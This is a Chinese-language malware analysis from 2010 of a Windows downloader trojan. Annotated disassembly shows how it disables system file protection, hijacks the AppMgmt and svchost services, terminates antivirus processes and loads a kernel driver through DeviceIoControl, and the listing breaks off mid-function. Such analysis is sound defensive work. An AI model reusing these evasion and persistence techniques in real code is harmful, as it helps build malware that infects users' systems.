下载者DownLoader.Win32.Undef分析

DownLoader.Win32.Undef
下载者分析：
分析日期：2010.1.25

004018FE http_>/$>push ebp
004018FF |.>mov ebp, esp
00401901 |.>sub esp, 24
00401904 |.>and [local.9], 0
00401908 |.>and [local.8], 0
0040190C |.>push eax
0040190D |.>call 00401912
00401912 |$>mov eax, dword ptr [esp]
00401915 |.>mov [local.8], eax
00401918 |.>pop eax
00401919 |.>push 1C ; /n = 1C (28.)
0040191B |.>push 0 ; |c = 00
0040191D |.>lea eax, [local.7] ; |
00401920 |.>push eax ; |s
00401921 |.>call <jmp.&MSVCRT.memset> ; /memset 设置缓冲区指定的字符
00401926 |.>add esp, 0C
00401929 |.>push 1C ; /BufSize = 1C (28.)
0040192B |.>lea eax, [local.7] ; |
0040192E |.>push eax ; |Buffer
0040192F |.>push [local.8] ; |Address
00401932 |.>call dword ptr [<&KERNEL32.VirtualQu>; /VirtualQuery
00401938 |.>mov eax, [local.6]
0040193B |.>mov dword ptr [407574], eax
00401940 |.>push 0 ; /pModule = NULL
00401942 |.>call dword ptr [<&KERNEL32.GetModule>; /GetModuleHandleA 获取模块句柄
00401948 |.>cmp eax, dword ptr [407574] 比较模块基址和3C0000h,用于判断自身是exe还是dll文件
0040194E |.>jnz short 00401966 是exe往下执行call 1，是dll跳转到00401966地址执行call 2
00401950 |.>push [arg.4]
00401953 |.>push [arg.3]
00401956 |.>push [arg.2]
00401959 |.>push [arg.1]
0040195C |.>call 00401DC4 关键call 1，作用：创建C:/IOSYS.ini配置文件,加载sfc.dll,获得去除文件保护属性的导出函数地址，感染C:/WINDOWS/system32/appmgmts.dll，qmgr.dll
00401961 |.>mov [local.9], eax
00401964 |.>jmp short 00401977
00401966 |>>push [arg.3]
00401969 |.>push [arg.2]
0040196C |.>push [arg.1]
0040196F |.>call 00404295 关键call 2,
00401974 |.>mov [local.9], eax
00401977 |>>mov eax, [local.9]
0040197A |.>leave
0040197B /.>retn 10

复制代码

进入关键call 1，代码如下：

00401DC4 $>push ebp
00401DC5 .>mov ebp, esp
00401DC7 .>sub esp, 0C18
00401DCD .>and dword ptr [ebp-764], 0
00401DD4 .>and dword ptr [ebp-8], 0
00401DD8 .>and dword ptr [ebp-124], 0
00401DDF .>and dword ptr [ebp-14], 0
00401DE3 .>and dword ptr [ebp-654], 0
00401DEA .>and dword ptr [ebp-4], 0
00401DEE .>and dword ptr [ebp-128], 0
00401DF5 .>mov eax, dword ptr [<&USER32.wsprint>
00401DFA .>mov dword ptr [ebp-C], eax
00401DFD .>call dword ptr [<&USER32.GetInputSta>; [GetInputState
00401E03 .>push 0 ; /lParam = 0
00401E05 .>push 0 ; |wParam = 0
00401E07 .>push 0 ; |Message = WM_NULL
00401E09 .>call dword ptr [<&KERNEL32.GetCurren>; |[GetCurrentThreadId
00401E0F .>push eax ; |ThreadId
00401E10 .>call dword ptr [<&USER32.PostThreadM>; /PostThreadMessageA
00401E16 .>push 0 ; /MsgFilterMax = 0
00401E18 .>push 0 ; |MsgFilterMin = 0
00401E1A .>push 0 ; |hWnd = NULL
00401E1C .>lea eax, dword ptr [ebp-24C] ; |
00401E22 .>push eax ; |pMsg
00401E23 .>call dword ptr [<&USER32.GetMessageA>; /GetMessageA
00401E29 .>push 0040757C
00401E2E .>push 00407578
00401E33 .>push 0
00401E35 .>call 0040197E
00401E3A .>push 104 ; /BufSize = 104 (260.)
00401E3F .>lea eax, dword ptr [ebp-230] ; |
00401E45 .>push eax ; |Buffer
00401E46 .>call dword ptr [<&KERNEL32.GetWindow>; /GetWindowsDirectoryA
00401E4C .>push 104 ; /n = 104 (260.)
00401E51 .>push 0 ; |c = 00
00401E53 .>lea eax, dword ptr [ebp-120] ; |
00401E59 .>push eax ; |s
00401E5A .>call <jmp.&MSVCRT.memset> ; /memset
00401E5F .>add esp, 0C
00401E62 .>lea eax, dword ptr [ebp-120]
00401E68 .>push eax ; /Buffer
00401E69 .>push 104 ; |BufSize = 104 (260.)
00401E6E .>call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
00401E74 .>push 0F003F
00401E79 .>push 0
00401E7B .>push 0
00401E7D .>call dword ptr [<&ADVAPI32.OpenSCMan>; advapi32.OpenSCManagerA
00401E83 .>mov dword ptr [ebp-4], eax
00401E86 .>push 0040536C ; /sfc_os.dll
00401E8B .>call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA 加载sfc.dll
00401E91 .>mov dword ptr [ebp-654], eax
00401E97 .>cmp dword ptr [ebp-654], 0
00401E9E .>jnz short 00401EAA
00401EA0 .>jmp 004020C8
00401EA5 .>jmp 004020C8
00401EAA >>push 5 ; /ProcNameOrOrdinal = #5
00401EAC .>push dword ptr [ebp-654] ; |hModule
00401EB2 .>call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress 获得去除文件保护属性的#5函数地址
00401EB8 .>mov dword ptr [407580], eax
00401EBD .>and dword ptr [ebp-768], 0
00401EC4 .>and dword ptr [ebp-B6C], 0
00401ECB .>jmp short 00401EDA
00401ECD >>mov eax, dword ptr [ebp-B6C]
00401ED3 .>inc eax
00401ED4 .>mov dword ptr [ebp-B6C], eax
00401EDA >>cmp dword ptr [ebp-B6C], 12
00401EE1 .>jge 004020C8
00401EE7 .>push dword ptr [ebp-B6C]
00401EED .>push 0
00401EEF .>push 40
00401EF1 .>lea eax, dword ptr [ebp-BB0]
00401EF7 .>push eax
00401EF8 .>call 004017AC //解密一些可以替换的服务名
00401EFD .>push dword ptr [ebp-B6C]
00401F03 .>push 1
00401F05 .>push 40
00401F07 .>lea eax, dword ptr [ebp-BF0]
00401F0D .>push eax
00401F0E .>call 004017AC //解密可以替换的服务对应的组件文件名
00401F13 .>push 0F01FF
00401F18 .>lea eax, dword ptr [ebp-BB0]
00401F1E .>push eax
00401F1F .>push dword ptr [ebp-4]
00401F22 .>call dword ptr [<&ADVAPI32.OpenServi>; advapi32.OpenServiceA
00401F28 .>mov dword ptr [ebp-128], eax
00401F2E .>cmp dword ptr [ebp-128], 0
00401F35 .>jnz short 00401F39
00401F37 .>jmp short 00401ECD //打开服务打开后返回上面选择下一个服务
00401F39 >>lea eax, dword ptr [ebp-C0C]
00401F3F .>push eax
00401F40 .>push dword ptr [ebp-128]
00401F46 .>call dword ptr [<&ADVAPI32.QueryServ>; advapi32.QueryServiceStatus 查找名为"AppMgmt"的服务，若找到，检查服务状态，如果该服务已启动，将其终止。
00401F4C .>cmp dword ptr [ebp-C08], 1
00401F53 .>je short 00401F8B
00401F55 .>cmp dword ptr [ebp-768], 0
00401F5C .>jnz short 00401F68
00401F5E .>jmp 0040207E //当服务状态查询返回失败的时候，跳至0040207E
00401F63 .>jmp 0040207E
00401F68 >>lea eax, dword ptr [ebp-C0C]
00401F6E .>push eax
00401F6F .>push 1
00401F71 .>push dword ptr [ebp-128]
00401F77 .>call dword ptr [<&ADVAPI32.ControlSe>; advapi32.ControlService
00401F7D .>test eax, eax
00401F7F .>jnz short 00401F8B
00401F81 .>jmp 0040207E
00401F86 .>jmp 0040207E
00401F8B >>push 104 ; /n = 104 (260.)
00401F90 .>push 0 ; |c = 00
00401F92 .>lea eax, dword ptr [ebp-760] ; |
00401F98 .>push eax ; |s
00401F99 .>call <jmp.&MSVCRT.memset> ; /memset
00401F9E .>add esp, 0C
00401FA1 .>cmp dword ptr [ebp-764], 0
00401FA8 .>jnz short 00401FD4
00401FAA .>push 00405378 ; /.dll
00401FAF .>lea eax, dword ptr [ebp-BF0] ; |
00401FB5 .>push eax ; |<%s>
00401FB6 .>lea eax, dword ptr [ebp-230] ; |
00401FBC .>push eax ; |<%s>
00401FBD .>push 00405380 ; |%s/system32/%s%s
00401FC2 .>lea eax, dword ptr [ebp-760] ; |
00401FC8 .>push eax ; |s
00401FC9 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 连接字符串 C:/WINDOWS/system32/appmgmts.dll
00401FCF .>add esp, 14
00401FD2 .>jmp short 00402009
00401FD4 >>call 0040176E
00401FD9 .>push eax ; /<%d>
00401FDA .>lea eax, dword ptr [ebp-120] ; |
00401FE0 .>push eax ; |<%s>
00401FE1 .>push 00405394 ; |%s%d.dll
00401FE6 .>lea eax, dword ptr [ebp-760] ; |
00401FEC .>push eax ; |s
00401FED .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 连接字符串
00401FF3 .>add esp, 10
00401FF6 .>lea eax, dword ptr [ebp-760]
00401FFC .>push eax
00401FFD .>lea eax, dword ptr [ebp-BB0]
00402003 .>push eax
00402004 .>call 00401B0C
00402009 >>lea eax, dword ptr [ebp-760]
0040200F .>push eax
00402010 .>call 00401BBD ; 检查文件appmgmts.dll是否存在
00402015 .>test eax, eax
00402017 .>jnz short 0040201D 若不存在，则创建C:/System32/appmgmts.dll。若找到appmgmts.dll，则去掉该文件保护属性，释放病毒动态链接库并命名为appmgmts.dll
00402019 .>jmp short 0040207E 若被感染就往下跳转
0040201B .>jmp short 0040207E
0040201D >>push 0
0040201F .>push 0
00402021 .>push dword ptr [ebp-128]
00402027 .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA 启动"AppMgmt"服务，通过该服务加载C:/System32/appmgmts.dll。
0040202D .>test eax, eax
0040202F .>jnz short 00402035 ;
00402031 .>jmp short 0040207E
00402033 .>jmp short 0040207E
00402035 >>push dword ptr [ebp-654] ; /hLibModule
0040203B .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
00402041 .>push dword ptr [ebp-128]
00402047 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
0040204D .>push dword ptr [ebp-4]
00402050 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
00402056 .>cmp dword ptr [407578], 0
0040205D .>je short 00402076
0040205F .>mov eax, dword ptr [407578]
00402064 .>mov dword ptr [ebp-C10], eax
0040206A .>push dword ptr [ebp-C10]
00402070 .>call <jmp.&MSVCRT.operator delete>
00402075 .>pop ecx
00402076 >>push 0 ; /ExitCode = 0
00402078 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
0040207E >>cmp dword ptr [ebp-764], 1
00402085 .>jnz short 00402094
00402087 .>lea eax, dword ptr [ebp-760]
0040208D .>push eax ; /FileName
0040208E .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
00402094 >>push dword ptr [ebp-128]
0040209A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
004020A0 .>cmp dword ptr [ebp-B6C], 11
004020A7 .>jnz short 004020C3
004020A9 .>cmp dword ptr [ebp-768], 0
004020B0 .>jnz short 004020C3
004020B2 .>mov dword ptr [ebp-768], 1
004020BC .>or dword ptr [ebp-B6C], FFFFFFFF
004020C3 >>jmp 00401ECD //服务状态查询返回失败选择下一个服务
004020C8 >>lea eax, dword ptr [ebp-10]
004020CB .>push eax ; /pHandle
004020CC .>push 1 ; |Access = KEY_QUERY_VALUE
004020CE .>push 0 ; |Reserved = 0
004020D0 .>push 004053A0 ; |SOFTWARE/Microsoft/Windows NT/CurrentVersion/Svchost
004020D5 .>push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004020DA .>call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
004020E0 .>push 400 ; /n = 400 (1024.)
004020E5 .>push 0 ; |c = 00
004020E7 .>lea eax, dword ptr [ebp-B68] ; |
004020ED .>push eax ; |s
004020EE .>call <jmp.&MSVCRT.memset> ; /memset
004020F3 .>add esp, 0C
004020F6 .>mov dword ptr [ebp-14], 400
004020FD .>lea eax, dword ptr [ebp-14]
00402100 .>push eax ; /pBufSize
00402101 .>lea eax, dword ptr [ebp-B68] ; |
00402107 .>push eax ; |Buffer
00402108 .>lea eax, dword ptr [ebp-124] ; |
0040210E .>push eax ; |pValueType
0040210F .>push 0 ; |Reserved = NULL
00402111 .>push 004053D8 ; |netsvcsvcs%SystemRoot%/System32/svchost.exe -k nets
00402116 .>push dword ptr [ebp-10] ; |hKey
00402119 .>call dword ptr [<&ADVAPI32.RegQueryV>; /RegQueryValueExA
0040211F .>push dword ptr [ebp-10] ; /hKey
00402122 .>call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
00402128 .>lea eax, dword ptr [ebp-B68]
0040212E .>mov dword ptr [ebp-8], eax
00402131 >>mov eax, dword ptr [ebp-8]
00402134 .>movsx eax, byte ptr [eax]
00402137 .>test eax, eax
00402139 .>je 004022AF
0040213F .>push 400 ; /n = 400 (1024.)
00402144 .>push 0 ; |c = 00
00402146 .>lea eax, dword ptr [ebp-650] ; |
0040214C .>push eax ; |s
0040214D .>call <jmp.&MSVCRT.memset> ; /memset
00402152 .>add esp, 0C
00402155 .>push 004053E0 ; vcs%SystemRoot%/System32/svchost.exe -k nets
0040215A .>push 004053E4 ; %SystemRoot%/System32/svchost.exe -k nets
0040215F .>push 00405410 ; %s%s
00402164 .>lea eax, dword ptr [ebp-650]
0040216A .>push eax
0040216B .>call dword ptr [ebp-C]
0040216E .>add esp, 10
00402171 .>push 0 ; /Password = NULL
00402173 .>push 0 ; |ServiceStartName = NULL
00402175 .>push 0 ; |pDependencies = NULL
00402177 .>push 0 ; |pTagId = NULL
00402179 .>push 0 ; |LoadOrderGroup = NULL
0040217B .>lea eax, dword ptr [ebp-650] ; |
00402181 .>push eax ; |BinaryPathName
00402182 .>push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
00402184 .>push 2 ; |StartType = SERVICE_AUTO_START
00402186 .>push 20 ; |ServiceType = SERVICE_WIN32_SHARE_PROCESS
00402188 .>push 10 ; |DesiredAccess = SERVICE_START
0040218A .>push dword ptr [ebp-8] ; |DisplayName
0040218D .>push dword ptr [ebp-8] ; |ServiceName
00402190 .>push dword ptr [ebp-4] ; |hManager
00402193 .>call dword ptr [<&ADVAPI32.CreateSer>; /CreateServiceA
00402199 .>mov dword ptr [ebp-128], eax
0040219F .>cmp dword ptr [ebp-128], 0
004021A6 .>je 00402281
004021AC .>cmp dword ptr [ebp-764], 0
004021B3 .>jnz short 004021DB
004021B5 .>push 00405378 ; /.dll
004021BA .>push dword ptr [ebp-8] ; |<%s>
004021BD .>lea eax, dword ptr [ebp-230] ; |
004021C3 .>push eax ; |<%s>
004021C4 .>push 00405380 ; |%s/system32/%s%s
004021C9 .>lea eax, dword ptr [ebp-760] ; |
004021CF .>push eax ; |s
004021D0 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
004021D6 .>add esp, 14
004021D9 .>jmp short 004021FD
004021DB >>call 0040176E
004021E0 .>push eax ; /<%d>
004021E1 .>lea eax, dword ptr [ebp-120] ; |
004021E7 .>push eax ; |<%s>
004021E8 .>push 00405394 ; |%s%d.dll
004021ED .>lea eax, dword ptr [ebp-760] ; |
004021F3 .>push eax ; |s
004021F4 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
004021FA .>add esp, 10
004021FD >>lea eax, dword ptr [ebp-760]
00402203 .>push eax
00402204 .>push dword ptr [ebp-8]
00402207 .>call 00401B0C
0040220C .>lea eax, dword ptr [ebp-760]
00402212 .>push eax
00402213 .>call 00401BBD
00402218 .>test eax, eax
0040221A .>jnz short 00402220
0040221C .>jmp short 00402281
0040221E .>jmp short 00402281
00402220 >>push 0
00402222 .>push 0
00402224 .>push dword ptr [ebp-128]
0040222A .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA
00402230 .>test eax, eax
00402232 .>jnz short 00402238
00402234 .>jmp short 00402281
00402236 .>jmp short 00402281
00402238 >>push dword ptr [ebp-654] ; /hLibModule
0040223E .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
00402244 .>push dword ptr [ebp-128]
0040224A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
00402250 .>push dword ptr [ebp-4]
00402253 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
00402259 .>cmp dword ptr [407578], 0
00402260 .>je short 00402279
00402262 .>mov eax, dword ptr [407578]
00402267 .>mov dword ptr [ebp-C14], eax
0040226D .>push dword ptr [ebp-C14]
00402273 .>call <jmp.&MSVCRT.operator delete>
00402278 .>pop ecx
00402279 >>push 0 ; /ExitCode = 0
0040227B .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
00402281 >>cmp dword ptr [ebp-764], 1
00402288 .>jnz short 00402297
0040228A .>lea eax, dword ptr [ebp-760]
00402290 .>push eax ; /FileName
00402291 .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
00402297 >>push dword ptr [ebp-8] ; /String
0040229A .>call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
004022A0 .>mov ecx, dword ptr [ebp-8]
004022A3 .>lea eax, dword ptr [ecx+eax+1]
004022A7 .>mov dword ptr [ebp-8], eax
004022AA .>jmp 00402131
004022AF >>push dword ptr [ebp-654] ; /hLibModule
004022B5 .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
004022BB .>push dword ptr [ebp-4]
004022BE .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
004022C4 .>cmp dword ptr [407578], 0
004022CB .>je short 004022E4
004022CD .>mov eax, dword ptr [407578]
004022D2 .>mov dword ptr [ebp-C18], eax
004022D8 .>push dword ptr [ebp-C18]
004022DE .>call <jmp.&MSVCRT.operator delete>
004022E3 .>pop ecx
004022E4 >>push 0 ; /ExitCode = 0
004022E6 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
004022EC .>leave
004022ED .>retn 10

复制代码

进入关键call 2，代码如下：

003C4295 /$ 5>push ebp
003C4296 |. 8>mov ebp, esp
003C4298 |. 8>cmp [arg.2], 1
003C429C |. 7>jnz short 003C42B3
003C429E |. 6>push 0 ; /pThreadId = NULL
003C42A0 |. 6>push 0 ; |CreationFlags = 0
003C42A2 |. 6>push 0 ; |pThreadParm = NULL
003C42A4 |. 6>push 003C43D1 ; |ThreadFunction = appmgmts.003C43D1
003C42A9 |. 6>push 0 ; |StackSize = 0
003C42AB |. 6>push 0 ; |pSecurity = NULL
003C42AD |. F>call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建一个线程1
003C42B3 |> 3>xor eax, eax
003C42B5 |. 4>inc eax
003C42B6 |. 5>pop ebp
003C42B7 /. C>retn 0C

复制代码

进入线程 1，代码如下：

003C43D1 >push ebp
003C43D2 >mov ebp, esp
003C43D4 >mov eax, 1DA0
003C43D9 >call 003C4920
003C43DE >and dword ptr [ebp-18], 0
003C43E2 >and dword ptr [ebp-8], 0
003C43E6 >and dword ptr [ebp-14], 0
003C43EA >and dword ptr [ebp-1C], 0
003C43EE >and dword ptr [ebp-20], 0
003C43F2 >or dword ptr [ebp-10], FFFFFFFF
003C43F6 >and dword ptr [ebp-4], 0
003C43FA >mov eax, dword ptr [<&USER32.wsprint>
003C43FF >mov dword ptr [ebp-C], eax
003C4402 >mov eax, dword ptr [<&SHLWAPI.SHDele>
003C4407 >mov dword ptr [ebp-930], eax
003C440D >mov eax, dword ptr [<&KERNEL32.Sleep>
003C4412 >mov dword ptr [ebp-92C], eax
003C4418 >push 0
003C441A >call 003C1550 打开配置文件C:/IOSYS.ini
003C441F >mov dword ptr [3C7588], eax
003C4424 >push 003C564C ; ASCII "avp.exe"
003C4429 >call 003C1000 关闭遍历进程杀毒软件
003C442E >test eax, eax
003C4430 >jnz short 003C4440
003C4432 >push 003C5654 ; ASCII "bdagent.exe"
003C4437 >call 003C1000 关闭遍历进程杀毒软件
003C443C >test eax, eax
003C443E >je short 003C4445
003C4440 >call 003C133B
003C4445 >push 0
003C4447 >push dword ptr [3C600C]
003C444D >push 800
003C4452 >push 003C6350
003C4457 >call 003C1680 解密字符函数，这里解密出KVMonXP.kxp
003C445C >push 104 ; /n = 104 (260.)
003C4461 >push 0 ; |c = 00
003C4463 >push 003C7368 ; |s = appmgmts.003C7368
003C4468 >call <jmp.&MSVCRT.memset> ; /memset
003C446D >add esp, 0C
003C4470 >push 003C7368 ; /Buffer = appmgmts.003C7368
003C4475 >push 104 ; |BufSize = 104 (260.)
003C447A >call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
003C4480 >push 104 ; /n = 104 (260.)
003C4485 >push 0 ; |c = 00
003C4487 >push 003C7470 ; |s = appmgmts.003C7470
003C448C >call <jmp.&MSVCRT.memset> ; /memset
003C4491 >add esp, 0C
003C4494 >push 104 ; /BufSize = 104 (260.)
003C4499 >push 003C7470 ; |Buffer = appmgmts.003C7470
003C449E >call dword ptr [<&KERNEL32.GetSystem>; /GetSystemDirectoryA
003C44A4 >push 104 ; /n = 104 (260.)
003C44A9 >push 0 ; |c = 00
003C44AB >lea eax, dword ptr [ebp-B40] ; |
003C44B1 >push eax ; |s
003C44B2 >call <jmp.&MSVCRT.memset> ; /memset
003C44B7 >add esp, 0C
003C44BA >push 003C5660 ; ASCII "Accopt.sys"
003C44BF >push 003C7368
003C44C4 >push 003C5410 ; ASCII "%s%s"
003C44C9 >lea eax, dword ptr [ebp-B40]
003C44CF >push eax
003C44D0 >call dword ptr [ebp-C] 字符连接函数
003C44D3 >add esp, 10
003C44D6 >push 80
003C44DB >push 65
003C44DD >push dword ptr [3C7574] ; appmgmts.003C0000
003C44E3 >lea eax, dword ptr [ebp-B40]
003C44E9 >push eax
003C44EA >call 003C13FE 获取自身资源信息
003C44EF >lea eax, dword ptr [ebp-B40]
003C44F5 >push eax
003C44F6 >call 003C4361 创建一个名为Accopt的服务
003C44FB >push 400 ; /n = 400 (1024.)
003C4500 >push 0 ; |c = 00
003C4502 >lea eax, dword ptr [ebp-F40] ; |
003C4508 >push eax ; |s
003C4509 >call <jmp.&MSVCRT.memset> ; /memset
003C450E >add esp, 0C
003C4511 >push 003C5644 ; /<%s> = "Accopt"
003C4516 >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
003C451C >push 003C534C ; |Format = "%s/%s"
003C4521 >lea eax, dword ptr [ebp-F40] ; |
003C4527 >push eax ; |s
003C4528 >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
003C452E >add esp, 10
003C4531 >lea eax, dword ptr [ebp-F40]
003C4537 >push eax
003C4538 >push 80000002
003C453D >call dword ptr [ebp-930] SHDeleteKey
003C4543 >lea eax, dword ptr [ebp-B40]
003C4549 >push eax ; /FileName
003C454A >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除驱动Accopt.sys文件
003C4550 >push 104 ; /BufSize = 104 (260.)
003C4555 >lea eax, dword ptr [ebp-A38] ; |
003C455B >push eax ; |PathBuffer
003C455C >push dword ptr [3C7574] ; |hModule = 003C0000 (appmgmts)
003C4562 >call dword ptr [<&KERNEL32.GetModule>; /GetModuleFileNameA
003C4568 >push 5C ; /c = 5C ('/')
003C456A >lea eax, dword ptr [ebp-A38] ; |
003C4570 >push eax ; |s
003C4571 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
003C4577 >pop ecx
003C4578 >pop ecx
003C4579 >inc eax
003C457A >push eax ; /String2
003C457B >lea eax, dword ptr [ebp-928] ; |
003C4581 >push eax ; |String1
003C4582 >call dword ptr [<&KERNEL32.lstrcpyA>>; /lstrcpyA
003C4588 >push 2E ; /c = 2E ('.')
003C458A >lea eax, dword ptr [ebp-928] ; |
003C4590 >push eax ; |s
003C4591 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
003C4597 >pop ecx
003C4598 >pop ecx
003C4599 >and dword ptr [eax], 0
003C459C >and dword ptr [ebp-F44], 0
003C45A3 >jmp short 003C45B2
003C45A5 >mov eax, dword ptr [ebp-F44]
003C45AB >inc eax
003C45AC >mov dword ptr [ebp-F44], eax
003C45B2 >cmp dword ptr [ebp-F44], 12
003C45B9 >jge 003C4687
003C45BF >push dword ptr [ebp-F44]
003C45C5 >push 0
003C45C7 >push 40
003C45C9 >lea eax, dword ptr [ebp-F88]
003C45CF >push eax
003C45D0 >call 003C17AC
003C45D5 >push dword ptr [ebp-F44]
003C45DB >push 1
003C45DD >push 40
003C45DF >lea eax, dword ptr [ebp-FC8]
003C45E5 >push eax
003C45E6 >call 003C17AC
003C45EB >lea eax, dword ptr [ebp-FC8]
003C45F1 >push eax ; /String2
003C45F2 >lea eax, dword ptr [ebp-928] ; |
003C45F8 >push eax ; |String1
003C45F9 >call dword ptr [<&KERNEL32.lstrcmpiA>; /lstrcmpiA
003C45FF >test eax, eax
003C4601 >jnz short 003C4682
003C4603 >and dword ptr [ebp-FCC], 0
003C460A >mov dword ptr [ebp-FD0], 2
003C4614 >lea eax, dword ptr [ebp-F88]
003C461A >push eax ; /<%s>
003C461B >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
003C4621 >push 003C534C ; |Format = "%s/%s"
003C4626 >lea eax, dword ptr [ebp-13D0] ; |
003C462C >push eax ; |s
003C462D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
003C4633 >add esp, 10
003C4636 >lea eax, dword ptr [ebp-FCC]
003C463C >push eax ; /pHandle
003C463D >push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
003C4642 >push 0 ; |Reserved = 0
003C4644 >lea eax, dword ptr [ebp-13D0] ; |
003C464A >push eax ; |Subkey
003C464B >push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
003C4650 >call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
003C4656 >push 4 ; /BufSize = 4
003C4658 >lea eax, dword ptr [ebp-FD0] ; |
003C465E >push eax ; |Buffer
003C465F >push 4 ; |ValueType = REG_DWORD
003C4661 >push 0 ; |Reserved = 0
003C4663 >push 003C566C ; |ValueName = "Start"
003C4668 >push dword ptr [ebp-FCC] ; |hKey
003C466E >call dword ptr [<&ADVAPI32.RegSetVal>; /RegSetValueExA
003C4674 >push dword ptr [ebp-FCC] ; /hKey
003C467A >call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
003C4680 >jmp short 003C4687
003C4682 >jmp 003C45A5
003C4687 >push 0 ; /hTemplateFile = NULL
003C4689 >push 80 ; |Attributes = NORMAL
003C468E >push 3 ; |Mode = OPEN_EXISTING
003C4690 >push 0 ; |pSecurity = NULL
003C4692 >push 1 ; |ShareMode = FILE_SHARE_READ
003C4694 >push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
003C4699 >push 003C5674 ; |FileName = "//./Accopt"
003C469E >call dword ptr [<&KERNEL32.CreateFil>; /CreateFileA
003C46A4 >mov dword ptr [ebp-10], eax
003C46A7 >cmp dword ptr [ebp-10], -1
003C46AB >jnz short 003C46B7
003C46AD >jmp 003C48A2
003C46B2 >jmp 003C48A2
003C46B7 >cmp dword ptr [ebp-4], 0
003C46BB >jnz 003C4755
003C46C1 >and dword ptr [ebp-14DC], 0
003C46C8 >and dword ptr [ebp-14E0], 0
003C46CF >push 104 ; /n = 104 (260.)
003C46D4 >push 0 ; |c = 00
003C46D6 >lea eax, dword ptr [ebp-14D8] ; |
003C46DC >push eax ; |s
003C46DD >call <jmp.&MSVCRT.memset> ; /memset
003C46E2 >add esp, 0C
003C46E5 >lea eax, dword ptr [ebp-14D8]
003C46EB >push eax
003C46EC >call 003C10A6
003C46F1 >mov dword ptr [ebp-14DC], eax
003C46F7 >lea eax, dword ptr [ebp-14D8]
003C46FD >push eax ; /FileName
003C46FE >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
003C4704 >mov dword ptr [ebp-14E0], eax
003C470A >push 003C5680 ; /ProcNameOrOrdinal = "MmGetSystemRoutineAddress"
003C470F >push dword ptr [ebp-14E0] ; |hModule
003C4715 >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
003C471B >mov ecx, dword ptr [ebp-14DC]
003C4721 >sub ecx, dword ptr [ebp-14E0]
003C4727 >add eax, ecx
003C4729 >mov dword ptr [ebp-4], eax
003C472C >push dword ptr [ebp-14E0] ; /hLibModule
003C4732 >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
003C4738 >cmp dword ptr [ebp-4], 0
003C473C >jnz short 003C4755
003C473E >push dword ptr [ebp-10] ; /hObject
003C4741 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
003C4747 >or dword ptr [ebp-10], FFFFFFFF
003C474B >jmp 003C48A2
003C4750 >jmp 003C48A2
003C4755 >mov eax, dword ptr [ebp-4]
003C4758 >mov dword ptr [ebp-1C], eax
003C475B >push 0 ; /pOverlapped = NULL
003C475D >lea eax, dword ptr [ebp-14] ; |
003C4760 >push eax ; |pBytesReturned
003C4761 >push 4 ; |OutBufferSize = 4
003C4763 >lea eax, dword ptr [ebp-20] ; |
003C4766 >push eax ; |OutBuffer
003C4767 >push 4 ; |InBufferSize = 4
003C4769 >lea eax, dword ptr [ebp-1C] ; |
003C476C >push eax ; |InBuffer
003C476D >push 222193 ; |IoControlCode = 222193
003C4772 >push dword ptr [ebp-10] ; |hDevice
003C4775 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
003C477B >cmp dword ptr [3C6054], 0
003C4782 >je short 003C47C8
003C4784 >mov eax, dword ptr [ebp-1C]
003C4787 >cmp eax, dword ptr [ebp-4]
003C478A >je short 003C47C8
003C478C >cmp dword ptr [ebp-20], 0
003C4790 >je short 003C47C8
003C4792 >lea eax, dword ptr [ebp-1DA0]
003C4798 >push eax
003C4799 >push dword ptr [ebp-1C]
003C479C >push dword ptr [ebp-20]
003C479F >call 003C1151
003C47A4 >push 0 ; /pOverlapped = NULL
003C47A6 >lea eax, dword ptr [ebp-14] ; |
